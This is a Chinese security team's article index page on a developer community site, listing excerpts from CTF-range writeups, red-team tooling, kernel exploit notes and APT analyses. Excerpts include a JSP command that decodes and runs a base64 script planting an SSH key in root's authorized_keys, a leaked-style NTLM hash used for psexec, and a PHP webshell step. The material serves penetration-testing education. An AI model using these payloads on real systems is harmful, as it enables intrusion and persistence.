腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
首页
学习
活动
专区
工具
TVP
最新优惠活动
返回腾讯云官网
Gcow安全团队
专栏成员
举报
97
文章
178210
阅读量
38
订阅数
订阅专栏
申请加入专栏
全部文章(97)
网络安全(48)
安全(32)
https(31)
shell(15)
php(13)
http(13)
编程算法(12)
tcp/ip(12)
windows(12)
sql(10)
python(9)
数据库(8)
windows server(8)
网站(8)
html(6)
api(6)
ssh(5)
linux(4)
访问管理(4)
腾讯云测试服务(4)
开源(4)
工具(4)
c 语言(3)
bash(3)
node.js(3)
github(3)
bash 指令(3)
dns(3)
powershell(3)
数据分析(3)
腾讯云开发者社区(3)
漏洞扫描服务(3)
区块链(2)
javascript(2)
android(2)
access(2)
打包(2)
git(2)
文件存储(2)
命令行工具(2)
企业(2)
爬虫(2)
微信(2)
unicode(2)
ascii(2)
drupal(2)
测试(2)
登录(2)
服务(2)
脚本(2)
流量(2)
权限(2)
其他(1)
ios(1)
java(1)
c++(1)
.net(1)
单片机(1)
硬件开发(1)
postgresql(1)
phpmyadmin(1)
struts(1)
unix(1)
apt-get(1)
thinkphp(1)
SSL 证书(1)
serverless(1)
存储(1)
自动化(1)
黑客(1)
wordpress(1)
hashmap(1)
asp(1)
grep(1)
rpc(1)
kernel(1)
大数据(1)
安全漏洞(1)
网站建设(1)
云数据库 postgresql(1)
防火墙(1)
网站渗透测试(1)
ipv6(1)
黑盒测试(1)
fiddler(1)
数据库管理(1)
验证码(1)
代码签名证书(1)
bat(1)
caddy(1)
com(1)
diff(1)
ntlm(1)
root(1)
txt(1)
代理(1)
开发(1)
开发者(1)
配置(1)
事件(1)
网关(1)
协议(1)
序列化(1)
优化(1)
主机(1)
搜索文章
搜索
搜索
关闭
Fscan 二开记录
ssh
ntlm
流量
网关
优化
Gcow安全团队
2023-12-21
559
0
横向移动工具开发:wmiexec-Pro
防火墙
测试
工具
开发
事件
可以看到,该项目的Todo,依旧想的是围绕注册表去进行修改,为此我们先把注册表传输文件放一边 WMIHACKER的文件传输部分
Gcow安全团队
2023-09-15
830
0
Ichunqiu云境 —— Endless(无间计划) Writeup
数据库
测试
登录
服务
权限
7. 后续复盘和作者交流过,gitlab不能直接拿下,但是最新的exp我没测试,有兴趣的大哥可以测试一下
Gcow安全团队
2023-09-15
496
0
Ichunqiu云境 —— Exchange Writeup
登录
工具
权限
序列化
主机
Gcow安全团队
2023-09-15
226
0
Crackmapexec 6.1.0 和一些杂项
开源
com
工具
开发者
协议
Gcow安全团队
2023-09-14
501
0
基于Caddy实现的C2前置代理 - RedCaddy
caddy
代理
脚本
流量
配置
1、首先的话,我们就不手撸一个http服务作为核心了(作者也没那本事),我们可以选中已有的开源http服务作为核心,这里选中了caddy作为核心,主要是配置挺方便,性能也高
Gcow安全团队
2023-09-02
607
0
搞点什么:zerologon一键利用工具
存储
安全
服务
工具
脚本
ldap 过滤语句如下所示,我们这里取DA + EA组内,已经启用的用户,但是这里有个弊端,后续会讲searchFilter = f"(&(|(memberof=CN=Domain Admins,CN=Users,{baseDN})(memberof=CN=Enterprise Admins,CN=Users,{baseDN}))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))"
Gcow安全团队
2023-09-02
396
0
赏金猎人:IChunQiu云境-Spoofing Writeup
python
<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL3NKaDY4Uk5hWktLakNQaE40WUxpSnJ4eDR3N3JtbDBGcFRmMTNYNHVKZlpFZm4yU25scE9rdXQ0OE1LdURHOEtDcXczRW0zNU9odXdUa2p3ZEkvRGhGN3ZSeTB0T2xtWDE5NmJHcXpndE5pM1YzUHExc3NCMzV5Ui85SHJ6ZjVEdHdqS2NKdkphV0RuZzU2UWhHZjlnR21vdUZVQWV2QjdsUWl3a01FNWNxTzVsQTRwUm5KVEh2RU1OQUkxQkc3MTBEeWNKT28rNGh1TGNNVjZhdUs3UXdKTWdnN0oyU2U5TEpGZWk2R2g0amJUSGRhdmNBVjV6VVJZeFI4QVNXSmNqY29tM2dMUEE1UWNxSzNzSERRVmswUHllaTR3cEJwWWlFUGlHcHlQR2Y1T3ErUU0xQmJyR0gvTlRBYnZWa3dDZnBkRURWdVBNNWhHOFY4c09HTjIxczlWazFjMVBXaEh2WDZ1ejhRaDRNdUdnQlRYSHlZb3duTjg3OTExVDVGR0VjVzlWeUh1cm9FSVJtdE9sY3dBYmRMc0k0NVhOS1o0aWoxdERLNTRTMmpXWXhJTjhSL1ZuUnV2RVVoTVpGOUlabDM3UW5EQnBFR25LTXFjTVE4cHVUZUJBMngvSURHMFR6MWxjVGk5WHp5WjVheTd4dTJwZStidXhWT1BSQ2M9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print(""); while((a=in.read(b))!=-1){ out.println(new String(b)); } out.print("");%>
Gcow安全团队
2023-02-17
693
0
Ichunqiu云境 —— Tsclient Writeup
python
解出凭据,用administrator + psexec 139横向(外网没有开445)就能获取到 flag01 administrator 2caf35bb4c5059a3d50599844e2b9b1f
Gcow安全团队
2023-02-17
446
0
Ichunqiu云境 - Delegation Writeup
bat
diff
root
txt
4. 使用弱口令登录进入后台,去到模板页面,编辑header.html,添加php一句话
Gcow安全团队
2023-02-17
379
0
Ichunqiu云境 - Delegation Writeup
https
html
网络安全
编程算法
php
0x1 Info图片0x2 ReconTarget external IP39.98.34.149Nmap results图片关注80端口的http服务,目录爆破(省略)找到 /admin 图片使用弱口令登录进入后台,去到模板页面,编辑header.html,添加php一句话`用户名: admin, 密码:123456![f71dd2cf6322f6235561582fe3698a6.png](https://ask8088-private-1251520898.cn-south.myqcloud.com/
Gcow安全团队
2022-12-10
434
0
重磅发布:创宇安全智脑强势来袭
tcp/ip
网络安全
安全
大数据
api
自2020 年来,全球疫情爆发,国际形势日益严峻,已有超40个国家背景的APT组织针对我国发起超5000次攻击行动,网络空间威胁重重,我国重点民生单位业务系统首当其冲,直面危机。
Gcow安全团队
2022-08-31
1.5K
0
某内网域渗透靶场的writeup
shell
powershell
数据库
sql
本靶场是由"渗透攻击红队"所制作的一个靶场,看了看感觉效果十分不错,比较综合且有一定的思路扩展性.这里我们将会从别的一些角度来玩玩这个靶场,具体往下看。
Gcow安全团队
2021-11-19
2.9K
0
洞态IAST Python探针内测版发布
网络安全
安全
python
洞态 IAST 首发 Python-agent 尝鲜,验证 Agent 针对路径穿越漏洞的检测能力。
Gcow安全团队
2021-09-10
1K
0
vip业务权限漏洞挖掘入门姿势实战
android
ios
网站
https
安全
现在很多网站都是通过卖VIP会员盈利的,为了让用户更有购买欲望,有的时候会把内容展示一小部分,然后隐藏绝大多部分,让你看完一点还想看就忍不住付钱了:),产品经理的愿景是很美好的,但是开发人员的水平是参差不齐的,最终实现的效果可能就会有各种各样的问题,甚至留下安全隐患。
Gcow安全团队
2021-09-10
551
0
Windows Kernel Exploitation Notes(二)——HEVD Write-What-Where
https
网络安全
windows
shell
api
•物理机OS:Windows 10 20H2 x64•物理机WinDbg:10.0.19041.685•虚拟机OS:Windows 7 SP1 x86(6.1.7601.17514)•VMware:VMware Workstation 15 Pro•Visual Studio 2019
Gcow安全团队
2021-07-22
543
0
Thinkphp5.0.0-5.0.18 RCE分析
编程算法
thinkphp
php
漏洞代码位于:thinkphp/library/think/Request.php
Gcow安全团队
2021-07-22
949
0
Windows Kernel Exploitation Notes(一)——HEVD Stack Overflow
https
网络安全
windows
硬件开发
github
Windows Kernel Exploitation Notes(一)——HEVD Stack Overflow 1.本文一共4556个字 20张图 预计阅读时间17分钟2.本文作者erfze 属于Gcow安全团队复眼小组 未经过许可禁止转载3.本篇文章是Windows Kernel Exploitation Notes系列文章的第一篇HEVD Stack Overflow4.本篇文章十分适合漏洞安全研究人员进行交流学习5.若文章中存在说得不清楚或者错误的地方 欢迎师傅到公众号后台留言中指出 感激不尽 0
Gcow安全团队
2021-06-25
812
0
Kimsuky APT组织使用新型的AppleSeed Android组件伪装成安全软件对韩特定目标进行攻击
php
android
kimsuky APT组织(又名Mystery Baby, Baby Coin, Smoke Screen, BabyShark, Cobra Venom) ,该组织一直针对于韩国的智囊团,政府组织,新闻组织,大学教授等等进行活动.并且该组织拥有windows平台的攻击能力,载荷便捷,阶段繁多。并且该组织十分活跃.其载荷有带有漏洞的hwp文件,携带恶意宏文档,释放dll载荷的PE文件,远程模板注入技术docx文档,恶意的wsf以及js的脚本文件等
Gcow安全团队
2021-05-17
1.6K
0
Internet Explorer漏洞分析(五)——CVE-2016-0199
数据分析
安全
html
node.js
https
1.本文一共个字 张图 预计阅读时间分钟2.本文作者erfze 属于Gcow安全团队复眼小组 未经过许可禁止转载3.本篇文章是CVE-2016-0199漏洞的分析入手 详细的阐述漏洞的成因4.本篇文章十分适合漏洞安全研究人员进行交流学习5.若文章中存在说得不清楚或者错误的地方 欢迎师傅到公众号后台留言中指出 感激不尽
Gcow安全团队
2021-04-26
573
0
点击加载更多
社区活动
【纪录片】中国数据库前世今生
穿越半个世纪,探寻中国数据库50年的发展历程
立即查看
Python精品学习库
代码在线跑,知识轻松学
立即查看
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
立即体验
技术创作特训营·精选知识专栏
往期视频·千货材料·成员作品 最新动态
立即查看
领券
问题归档
专栏文章
快讯文章归档
关键词归档
开发者手册归档
开发者手册 Section 归档